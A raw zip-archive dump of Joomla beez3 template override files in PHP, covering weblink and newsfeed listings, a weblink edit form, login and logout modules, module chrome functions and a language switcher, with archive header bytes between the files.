			<?php if ($this->params->get('show_link_hits')) : ?>
			<th class="hits">
					<?php echo JHtml::_('grid.sort',  'JGLOBAL_HITS', 'hits', $listDirn, $listOrder); ?>
			</th>
			<?php endif; ?>
		</tr>
	</thead>
	<?php endif; ?>
	<tbody>
	<?php foreach ($this->items as $i => $item) : ?>
		<?php if ($this->items[$i]->state == 0) : ?>
			<tr class="system-unpublished cat-list-row<?php echo $i % 2; ?>">
		<?php else: ?>
			<tr class="cat-list-row<?php echo $i % 2; ?>" >
		<?php endif; ?>

			<td class="title">
			<p>
				<?php if ($this->params->get('icons') == 0) : ?>
					 <?php echo JText::_('COM_WEBLINKS_LINK'); ?>
				<?php elseif ($this->params->get('icons') == 1) : ?>
					<?php if (!$this->params->get('link_icons')) : ?>
						<?php echo JHtml::_('image', 'system/'.$this->params->get('link_icons', 'weblink.png'), JText::_('COM_WEBLINKS_LINK'), null, true); ?>
					<?php else: ?>
						<?php echo '<img src="'.$this->params->get('link_icons').'" alt="'.JText::_('COM_WEBLINKS_LINK').'" />'; ?>
					<?php endif; ?>
				<?php endif; ?>
				<?php
					// Compute the correct link
					$menuclass = 'category' . $this->pageclass_sfx;
					$link   = $item->link;
					$width  = $item->params->get('width');
					$height = $item->params->get('height');

					if ($width == null || $height == null)
					{
						$width  = 600;
						$height = 500;
					}

					switch ($item->params->get('target', $this->params->get('target')))
					{
						case 1:
							// open in a new window
							echo '<a href="'. $link .'" target="_blank" class="'. $menuclass .'" rel="nofollow">'.
								$this->escape($item->title) .'</a>';
							break;

						case 2:
							// open in a popup window
							$attribs = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width='.$this->escape($width).',height='.$this->escape($height).'';
							echo "<a href=\"$link\" onclick=\"window.open(this.href, 'targetWindow', '".$attribs."'); return false;\">".
								$this->escape($item->title).'</a>';
							break;
						case 3:
							// open in a modal window
							JHtml::_('behavior.modal', 'a.modal');
							echo '<a class="modal" href="'.$link.'"  rel="{handler: \'iframe\', size: {x:'.$this->escape($width).', y:'.$this->escape($height).'}}">'.
								$this->escape($item->title). ' </a>';
							break;

						default:
							// open in parent window
							echo '<a href="'.  $link . '" class="'. $menuclass .'" rel="nofollow">'.
								$this->escape($item->title) . ' </a>';
							break;
					}
				?>
				<?php // Code to add the edit link for the weblink. ?>

						<?php if ($canEdit) : ?>
							<ul class="actions">
								<li class="edit-icon">
									<?php echo JHtml::_('icon.edit', $item, $item->params); ?>
								</li>
							</ul>
						<?php endif; ?>
			</p>
			<?php $tagsData = $item->tags->getItemTags('com_weblinks.weblink', $item->id); ?>
			<?php if ($this->params->get('show_tags', 1)) : ?>
				<?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
				<?php echo $this->item->tagLayout->render($tagsData); ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_link_description') and ($item->description != '')) : ?>
				<?php $images = json_decode($item->images); ?>
				<?php  if (isset($images->image_first) and !empty($images->image_first)) : ?>
				<?php $imgfloat = empty($images->float_first) ? $this->params->get('float_first') : $images->float_first; ?>
				<div class="img-intro-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?>"> <img
					<?php if ($images->image_first_caption):
						echo 'class="caption"'.' title="' .htmlspecialchars($images->image_first_caption, ENT_COMPAT, 'UTF-8') .'"';
					endif; ?>
					src="<?php echo htmlspecialchars($images->image_first, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_first_alt, ENT_COMPAT, 'UTF-8'); ?>"/> </div>
				<?php endif; ?>
				<?php  if (isset($images->image_second) and !empty($images->image_second)) : ?>
					<?php $imgfloat = empty($images->float_second) ? $this->params->get('float_second') : $images->float_second; ?>
					<div class="pull-<?php echo htmlspecialchars($imgfloat, ENT_COMPAT, 'UTF-8'); ?> item-image"> <img
					<?php if ($images->image_second_caption):
						echo 'class="caption"'.' title="' .htmlspecialchars($images->image_second_caption, ENT_COMPAT, 'UTF-8') .'"';
					endif; ?>
					src="<?php echo htmlspecialchars($images->image_second, ENT_COMPAT, 'UTF-8'); ?>" alt="<?php echo htmlspecialchars($images->image_second_alt, ENT_COMPAT, 'UTF-8'); ?>"/> </div>
				<?php endif; ?>

				<?php echo $item->description; ?>
			<?php endif; ?>
		</td>
		<?php if ($this->params->get('show_link_hits')) : ?>
		<td class="hits">
			<?php echo $item->hits; ?>
		</td>
		<?php endif; ?>
	</tr>
	<?php endforeach; ?>
</tbody>
</table>

	<?php // Code to add a link to submit a weblink. ?>
	<?php /* if ($canCreate) : // TODO This is not working due to some problem in the router, I think. Ref issue #23685 ?>
		<?php echo JHtml::_('icon.create', $item, $item->params); ?>
 	<?php  endif; */ ?>
		<?php if ($this->params->get('show_pagination')) : ?>
		 <div class="pagination">
			<?php if ($this->params->def('show_pagination_results', 1)) : ?>
				<p class="counter">
					<?php echo $this->pagination->getPagesCounter(); ?>
				</p>
			<?php endif; ?>
				<?php echo $this->pagination->getPagesLinks(); ?>
			</div>
		<?php endif; ?>
	</form>
<?php endif; ?>
PK!3:�]]%beez3/html/com_weblinks/form/edit.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidation');

// Create shortcut to parameters.
$params = $this->state->get('params');
?>

<script type="text/javascript">
	Joomla.submitbutton = function(task)
	{
		if (task === 'weblink.cancel' || document.formvalidator.isValid(document.getElementById('adminForm')))
		{
			<?php echo $this->form->getField('description')->save(); ?>
			Joomla.submitform(task);
		}
	}
</script>
<div class="edit<?php echo $this->pageclass_sfx; ?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
	<h1>
		<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
	<?php endif; ?>
	<form action="<?php echo JRoute::_('index.php?option=com_weblinks&view=form&w_id='.(int) $this->item->id); ?>" method="post" name="adminForm" id="adminForm" class="form-validate form-vertical">
		<div class="btn-toolbar">
			<div class="btn-group">
				<button type="button" class="btn btn-primary" onclick="Joomla.submitbutton('weblink.save')">
					<span class="icon-ok" aria-hidden="true"></span> <?php echo JText::_('JSAVE') ?>
				</button>
			</div>
			<div class="btn-group">
				<button type="button" class="btn" onclick="Joomla.submitbutton('weblink.cancel')">
					<span class="icon-cancel" aria-hidden="true"></span> <?php echo JText::_('JCANCEL') ?>
				</button>
			</div>
		</div>

		<hr class="hr-condensed" />
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('title'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('title'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('alias'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('alias'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('catid'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('catid'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('tags'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('tags'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('url'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('url'); ?>
			</div>
		</div>
		<?php if ($this->user->authorise('core.edit.state', 'com_weblinks.weblink')) : ?>
			<div class="control-group">
				<div class="control-label">
					<?php echo $this->form->getLabel('state'); ?>
				</div>
				<div class="controls">
					<?php echo $this->form->getInput('state'); ?>
				</div>
			</div>
		<?php endif; ?>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('language'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('language'); ?>
			</div>
		</div>
		<div class="control-group">
			<div class="control-label">
				<?php echo $this->form->getLabel('description'); ?>
			</div>
			<div class="controls">
				<?php echo $this->form->getInput('description'); ?>
			</div>
		</div>

		<input type="hidden" name="return" value="<?php echo $this->return_page;?>" />
		<input type="hidden" name="task" value="" />
		<?php echo JHtml::_('form.token'); ?>
	</form>
</div>
PK!���D��6beez3/html/com_newsfeeds/category/default_children.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$class = ' class="first"';
if ($this->maxLevel != 0 && count($this->children[$this->category->id]) > 0) :
?>
<ul>
<?php foreach ($this->children[$this->category->id] as $id => $child) : ?>
	<?php
	if ($child->numitems || $this->params->get('show_empty_categories') || count($child->getChildren())) :
	if (!isset($this->children[$this->category->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
		<?php $class = ''; ?>
			<span class="item-title"><a href="<?php echo JRoute::_(NewsfeedsHelperRoute::getCategoryRoute($child->id));?>">
				<?php echo $this->escape($child->title); ?></a>
			</span>

			<?php if ($this->params->get('show_subcat_desc') == 1) : ?>
			<?php if ($child->description) : ?>
				<div class="category-desc">
					<?php echo JHtml::_('content.prepare', $child->description, '', 'com_newsfeeds.category'); ?>
				</div>
			<?php endif; ?>
			<?php endif; ?>

			<?php if ($this->params->get('show_cat_items') == 1) : ?>
				<dl class="newsfeed-count"><dt>
					<?php echo JText::_('COM_NEWSFEEDS_CAT_NUM'); ?></dt>
					<dd><?php echo $child->numitems; ?></dd>
				</dl>
			<?php endif; ?>

			<?php if (count($child->getChildren()) > 0) :
				$this->children[$child->id] = $child->getChildren();
				$this->category = $child;
				$this->maxLevel--;
				echo $this->loadTemplate('children');
				$this->category = $child->getParent();
				$this->maxLevel++;
			endif; ?>
		</li>
	<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif;
PK!d��tt-beez3/html/com_newsfeeds/category/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');
?>
<div class="newsfeed-category<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
<?php if ($this->params->get('show_category_title', 1)) : ?>
<h2>
	<?php echo JHtml::_('content.prepare', $this->category->title, '', 'com_newsfeeds.category.title'); ?>
</h2>
<?php endif; ?>
<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
	<div class="category-desc">
	<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
		<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
	<?php endif; ?>
	<?php if ($this->category->description && $this->params->get('show_description')) : ?>
		<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_newsfeeds.category'); ?>
	<?php endif; ?>
	<div class="clr"></div>
	</div>
<?php endif; ?>

<?php echo $this->loadTemplate('items'); ?>

<?php if ($this->maxLevel != 0 && !empty($this->children[$this->category->id])) : ?>
<div class="cat-children">
	<h3><?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?></h3>
	<?php echo $this->loadTemplate('children'); ?>
</div>
<?php endif; ?>
</div>
PK!�*���3beez3/html/com_newsfeeds/category/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.framework');

$n         = count($this->items);
$listOrder = $this->escape($this->state->get('list.ordering'));
$listDirn  = $this->escape($this->state->get('list.direction'));
?>

<?php if (empty($this->items)) : ?>
	<p><?php echo JText::_('COM_NEWSFEEDS_NO_ARTICLES'); ?></p>
<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString(), ENT_COMPAT, 'UTF-8'); ?>" method="post" name="adminForm" id="adminForm">
	<fieldset class="filters">
	<legend class="hidelabeltxt"><?php echo JText::_('JGLOBAL_FILTER_LABEL'); ?></legend>
	<?php if ($this->params->get('show_pagination_limit')) : ?>
		<div class="display-limit">
			<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>&#160;
			<?php echo $this->pagination->getLimitBox(); ?>
		</div>
	<?php endif; ?>
	<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
	<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
	</fieldset>
	<table class="category">
		<?php if ($this->params->get('show_headings') == 1) : ?>
		<thead><tr>
				<th class="item-title" id="tableOrdering">
					<?php echo JHtml::_('grid.sort', 'COM_NEWSFEEDS_FEED_NAME', 'a.name', $listDirn, $listOrder); ?>
				</th>

				<?php if ($this->params->get('show_articles')) : ?>
				<th class="item-num-art" id="tableOrdering2">
					<?php echo JHtml::_('grid.sort', 'COM_NEWSFEEDS_NUM_ARTICLES', 'a.numarticles', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>

				<?php if ($this->params->get('show_link')) : ?>
				<th class="item-link" id="tableOrdering3">
					<?php echo JHtml::_('grid.sort', 'COM_NEWSFEEDS_FEED_LINK', 'a.link', $listDirn, $listOrder); ?>
				</th>
				<?php endif; ?>

			</tr>
		</thead>
		<?php endif; ?>

		<tbody>
			<?php foreach ($this->items as $i => $item) : ?>
				<?php if ($this->items[$i]->published == 0) : ?>
					<tr class="system-unpublished cat-list-row<?php echo $i % 2; ?>">
				<?php else: ?>
					<tr class="cat-list-row<?php echo $i % 2; ?>" >
				<?php endif; ?>

				<td class="item-title">
					<a href="<?php echo JRoute::_(NewsFeedsHelperRoute::getNewsfeedRoute($item->slug, $item->catid)); ?>">
						<?php echo $item->name; ?></a>
				</td>

				<?php if ($this->params->get('show_articles')) : ?>
					<td class="item-num-art">
						<?php echo $item->numarticles; ?>
					</td>
				<?php  endif; ?>

				<?php if ($this->params->get('show_link')) : ?>
					<td class="item-link">
						<a href="<?php echo $item->link; ?>"><?php echo $item->link; ?></a>
					</td>
				<?php endif; ?>

					</tr>

			<?php endforeach; ?>

		</tbody>
	</table>

	<?php if ($this->params->get('show_pagination')) : ?>
		<div class="pagination">
		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			<p class="counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php endif; ?>
		<?php echo $this->pagination->getPagesLinks(); ?>
		</div>
	<?php endif; ?>

</form>
<?php endif; ?>
PK!��dNN/beez3/html/com_newsfeeds/categories/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');
JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
	<h1>
		<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
	<?php endif; ?>

		<?php if ($this->params->get('show_base_description')) : ?>
		<?php // If there is a description in the menu parameters use that. ?>
			<?php if ($this->params->get('categories_description')) : ?>
				<div class="category-desc base-desc">
					<?php echo  JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_newsfeeds.categories'); ?>
				</div>
			<?php else : ?>
				<?php // Otherwise get one from the database if it exists. ?>
				<?php if ($this->parent->description) : ?>
					<div class="category-desc base-desc">
						<?php echo JHtml::_('content.prepare', $this->parent->description, '', 'com_newsfeeds.categories'); ?>
					</div>
				<?php endif; ?>
			<?php endif; ?>
		<?php endif; ?>
	<?php echo $this->loadTemplate('items'); ?>
</div>
PK!UϬ��5beez3/html/com_newsfeeds/categories/default_items.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_newsfeeds
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<span class="item-title"><a href="<?php echo JRoute::_(NewsfeedsHelperRoute::getCategoryRoute($item->id));?>">
			<?php echo $this->escape($item->title); ?></a>
		</span>
		<?php if ($this->params->get('show_subcat_desc_cat') == 1) :?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description, '', 'com_newsfeeds.categories'); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>
		<?php if ($this->params->get('show_cat_items_cat') == 1) : ?>
			<dl class="newsfeed-count"><dt>
				<?php echo JText::_('COM_NEWSFEEDS_CAT_NUM'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK!�S?��'beez3/html/mod_login/default_logout.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
?>
<form action="<?php echo JRoute::_('index.php', true, $params->get('usesecure')); ?>" method="post" id="login-form">
<?php if ($params->get('greeting')) : ?>
	<div class="login-greeting">
	<?php if ($params->get('name') == 0) : ?>
		<?php echo JText::sprintf('MOD_LOGIN_HINAME', htmlspecialchars($user->get('name'), ENT_COMPAT, 'UTF-8')); ?>
	<?php else : ?>
		<?php echo JText::sprintf('MOD_LOGIN_HINAME', htmlspecialchars($user->get('username'), ENT_COMPAT, 'UTF-8')); ?>
	<?php endif; ?>
	</div>
<?php endif; ?>
<?php if ($params->get('profilelink')) : ?>
	<div class="login-profilelink">
		<a href="<?php echo JRoute::_('index.php?option=com_users&view=profile'); ?>">
		<?php echo JText::_('MOD_LOGIN_PROFILE'); ?></a>
	</div>
<?php endif; ?>
<div class="logout-button">
	<input type="submit" name="Submit" class="button" value="<?php echo JText::_('JLOGOUT'); ?>" />
	<input type="hidden" name="option" value="com_users" />
	<input type="hidden" name="task" value="user.logout" />
	<input type="hidden" name="return" value="<?php echo $return; ?>" />
	<?php echo JHtml::_('form.token'); ?>
</div>
</form>
PK!�%D�** beez3/html/mod_login/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// no direct access
defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
?>
<form action="<?php echo JRoute::_('index.php', true, $params->get('usesecure')); ?>" method="post" id="login-form" >
<?php if ($params->get('pretext')) : ?>
	<div class="pretext">
	<p><?php echo $params->get('pretext'); ?></p>
	</div>
<?php endif; ?>
<fieldset class="userdata">
<p id="form-login-username">
	<label for="modlgn-username"><?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?></label>
	<input id="modlgn-username" type="text" name="username" class="inputbox"  size="18" />
</p>
<p id="form-login-password">
	<label for="modlgn-passwd"><?php echo JText::_('JGLOBAL_PASSWORD') ?></label>
	<input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
</p>
<?php if (count($twofactormethods) > 1) : ?>
	<div id="form-login-secretkey" class="control-group">
		<div class="controls">
			<?php if (!$params->get('usetext')) : ?>
				<div class="input-prepend input-append">
					<label for="modlgn-secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
					<input id="modlgn-secretkey" autocomplete="one-time-code" type="text" name="secretkey" class="input-small" tabindex="0" size="18" />
				</div>
			<?php else: ?>
				<label for="modlgn-secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY') ?></label>
				<input id="modlgn-secretkey" autocomplete="one-time-code" type="text" name="secretkey" class="input-small" tabindex="0" size="18" />
			<?php endif; ?>
		</div>
	</div>
<?php endif; ?>
<?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
	<p id="form-login-remember">
		<label for="modlgn-remember"><?php echo JText::_('MOD_LOGIN_REMEMBER_ME') ?></label>
		<input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"/>
	</p>
<?php endif; ?>
<input type="submit" name="Submit" class="button" value="<?php echo JText::_('JLOGIN') ?>" />
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return" value="<?php echo $return; ?>" />
<?php echo JHtml::_('form.token'); ?>
<ul>
	<li>
		<a href="<?php echo JRoute::_('index.php?option=com_users&view=reset'); ?>">
		<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_PASSWORD'); ?></a>
	</li>
	<li>
		<a href="<?php echo JRoute::_('index.php?option=com_users&view=remind'); ?>">
		<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_USERNAME'); ?></a>
	</li>
	<?php if (JComponentHelper::getParams('com_users')->get('allowUserRegistration')) : ?>
		<li>
			<a href="<?php echo JRoute::_('index.php?option=com_users&view=registration'); ?>">
			<?php echo JText::_('MOD_LOGIN_REGISTER'); ?></a>
		</li>
	<?php endif; ?>
</ul>
<?php if ($params->get('posttext')) : ?>
	<div class="posttext">
		<p><?php echo $params->get('posttext'); ?></p>
	</div>
<?php endif; ?>
</fieldset>
</form>
PK!���Obeez3/html/modules.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * beezDivision chrome.
 *
 * @since   3.0
 */
function modChrome_beezDivision($module, &$params, &$attribs)
{
	$headerLevel = isset($attribs['headerLevel']) ? (int) $attribs['headerLevel'] : 3;
	if (!empty ($module->content)) : ?>
		<div class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8'); ?>">
		<?php if ($module->showtitle) : ?>
			<h<?php echo $headerLevel; ?>><?php echo $module->title; ?></h<?php echo $headerLevel; ?>>
		<?php endif; ?>
		<?php echo $module->content; ?></div>
	<?php endif;
}

/**
 * beezHide chrome.
 *
 * @since   3.0
 */
function modChrome_beezHide($module, &$params, &$attribs)
{
	$headerLevel = isset($attribs['headerLevel']) ? (int) $attribs['headerLevel'] : 3;
	$state = isset($attribs['state']) ? (int) $attribs['state'] : 0;

	if (!empty ($module->content)) { ?>

<div
	class="moduletable_js <?php echo htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8');?>"><?php if ($module->showtitle) : ?>
<h<?php echo $headerLevel; ?> class="js_heading"> <?php echo $module->title; ?> <a href="#"
	title="<?php echo JText::_('TPL_BEEZ3_CLICK'); ?>"
	onclick="auf('module_<?php echo $module->id; ?>'); return false"
	class="opencloselink" id="link_<?php echo $module->id?>"> <span
	class="no"><img src="templates/beez3/images/plus.png"
	alt="<?php if ($state === 1) { echo JText::_('TPL_BEEZ3_ALTOPEN');} else {echo JText::_('TPL_BEEZ3_ALTCLOSE');} ?>" />
</span></a></h<?php echo $headerLevel; ?>> <?php endif; ?>
<div class="module_content <?php if ($state === 1){echo 'open';} ?>"
	id="module_<?php echo $module->id; ?>" tabindex="-1"><?php echo $module->content; ?></div>
</div>
	<?php }
}

/**
 * beezTabs chrome.
 *
 * @since   3.0
 */
function modChrome_beezTabs($module, $params, $attribs)
{
	$area = isset($attribs['id']) ? (int) $attribs['id'] : '1';
	$area = 'area-'.$area;

	static $modulecount;
	static $modules;

	if ($modulecount < 1)
	{
		$modulecount = count(JModuleHelper::getModules($module->position));
		$modules = array();
	}

	if ($modulecount === 1)
	{
		$temp = new stdClass;
		$temp->content = $module->content;
		$temp->title = $module->title;
		$temp->params = $module->params;
		$temp->id = $module->id;
		$modules[] = $temp;
		// list of moduletitles
		// list of moduletitles
		echo '<div id="'. $area.'" class="tabouter"><ul class="tabs">';

		foreach ($modules as $rendermodule)
		{
			echo '<li class="tab"><a href="#" id="link_'.$rendermodule->id.'" class="linkopen" onclick="tabshow(\'module_'. $rendermodule->id.'\');return false">'.$rendermodule->title.'</a></li>';
		}
		echo '</ul>';
		$counter = 0;
		// modulecontent
		foreach ($modules as $rendermodule)
		{
			$counter ++;

			echo '<div tabindex="-1" class="tabcontent tabopen" id="module_'.$rendermodule->id.'">';
			echo $rendermodule->content;
			if ($counter !== count($modules))
			{
			echo '<a href="#" class="unseen" onclick="nexttab(\'module_'. $rendermodule->id.'\');return false;" id="next_'.$rendermodule->id.'">'.JText::_('TPL_BEEZ3_NEXTTAB').'</a>';
			}
			echo '</div>';
		}
		$modulecount--;
		echo '</div>';
	} else {
		$temp = new stdClass;
		$temp->content = $module->content;
		$temp->params = $module->params;
		$temp->title = $module->title;
		$temp->id = $module->id;
		$modules[] = $temp;
		$modulecount--;
	}
}
PK!QJ�a__,beez3/html/layouts/joomla/system/message.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$msgList = $displayData['msgList'];

?>
<div id="system-message-container">
	<?php if (is_array($msgList) && $msgList) : ?>
		<dl id="system-message">
			<?php foreach ($msgList as $type => $msgs) : ?>
				<?php if ($msgs) : ?>
					<dt class="<?php echo strtolower($type); ?>"><?php echo JText::_($type); ?></dt>
					<dd class="<?php echo strtolower($type); ?> message">
						<ul>
							<?php foreach ($msgs as $msg) : ?>
								<li><?php echo $msg; ?></li>
							<?php endforeach; ?>
						</ul>
					</dd>
				<?php endif; ?>
			<?php endforeach; ?>
		</dl>
	<?php endif; ?>
</div>
PK!��T���$beez3/html/mod_languages/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_languages
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('stylesheet', 'mod_languages/template.css', array('version' => 'auto', 'relative' => true));
?>
<div class="mod-languages<?php echo $moduleclass_sfx; ?>">
<?php if ($headerText) : ?>
	<div class="pretext"><p><?php echo $headerText; ?></p></div>
<?php endif; ?>

<?php if ($params->get('dropdown', 1)) : ?>
	<form name="lang" method="post" action="<?php echo htmlspecialchars(JUri::current(), ENT_COMPAT, 'UTF-8'); ?>">
	<select class="inputbox" onchange="document.location.replace(this.value);" >
	<?php foreach ($list as $language) : ?>
		<option dir=<?php echo $language->rtl ? '"rtl"' : '"ltr"'; ?> value="<?php echo $language->link; ?>" <?php echo $language->active ? 'selected="selected"' : ''; ?>>
		<?php echo $language->title_native; ?></option>
	<?php endforeach; ?>
	</select>
	</form>
<?php else : ?>
	<ul class="<?php echo $params->get('inline', 1) ? 'lang-inline' : 'lang-block'; ?>">
	<?php foreach ($list as $language) : ?>
		<?php if (!$language->active || $params->get('show_active', 0)) : ?>
			<li class="<?php echo $language->active ? 'lang-active' : ''; ?>" dir="<?php echo $language->rtl ? 'rtl' : 'ltr'; ?>">
			<a href="<?php echo $language->link; ?>">
			<?php if ($params->get('image', 1)) : ?>
				<?php echo JHtml::_('image', 'mod_languages/' . $language->image . '.gif', $language->title_native, array('title' => $language->title_native), true); ?>
			<?php else : ?>
				<?php echo $params->get('full_name', 1) ? $language->title_native : strtoupper($language->sef); ?>
			<?php endif; ?>
			</a>
			</li>
		<?php endif; ?>
	<?php endforeach; ?>
	</ul>
<?php endif; ?>

<?php if ($footerText) : ?>
	<div class="posttext"><p><?php echo $footerText; ?></p></div>
<?php endif; ?>
</div>
PK!�Yb�U�Ubeez3/template_thumbnail.pngnu&1i��PNG


